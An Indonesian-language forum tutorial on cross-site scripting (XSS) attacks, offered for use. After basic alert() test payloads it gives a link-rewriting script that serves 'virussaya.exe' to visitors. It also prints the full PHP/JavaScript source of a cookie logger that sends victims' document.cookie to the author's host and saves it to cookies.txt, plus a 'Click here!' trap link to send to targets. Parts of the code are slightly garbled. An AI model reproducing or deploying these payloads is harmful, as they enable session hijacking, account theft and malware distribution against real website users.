Simpel XSS

XSS (Cross Site Scripting) bisa digunakan untuk memasukkan kode berbahaya ke sebuah website. Biasanya sih javascript, tapi dapat digunakan untuk php dan html juga
Serangan XSS inject ke dalam URL, dan dieksekusi .

Contoh :

http://www.contoh.com/search.php?&searchfor=<script>alert("XSS")</script>

ane gunain

<script>alert("XSS")</script>

sebagai contoh bisa juga

"><script>alert('XSS');</script>

jika website vuln terhadap xss maka akan keluar messagebox

ato klo mau pake tools add-on pirepox donlot dimari.

Maka bisa dihajar tuh web dg berbagai cara

1. Sebarin Virus
http://www.contoh.com/index.php?download...t;window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.websitekita.com/virussaya.exe”; }</script>

2. Nyolong akun pake stealing session/cookie
buatlah cookie logger nyang terdiri dari 2 file (Cookiemonster.php Cookies.txt )
+ Cookiemonster.php

(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./cookies.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>

+ Cookies.txt biarin kosong kk

trus upload deh ke hosting kk
pasang jebakan betmen

<a href="javascript:document.location='http://www.websitekita.com/cookiemonster.php?cookie='+document.cookie;">Click here!</a>

sebarin ke target....hasilnya berada di cookies.txt

sebenarnya masih banyak yg bisa dilakuin dari XSS tapi yg ane tau baru itu doang =))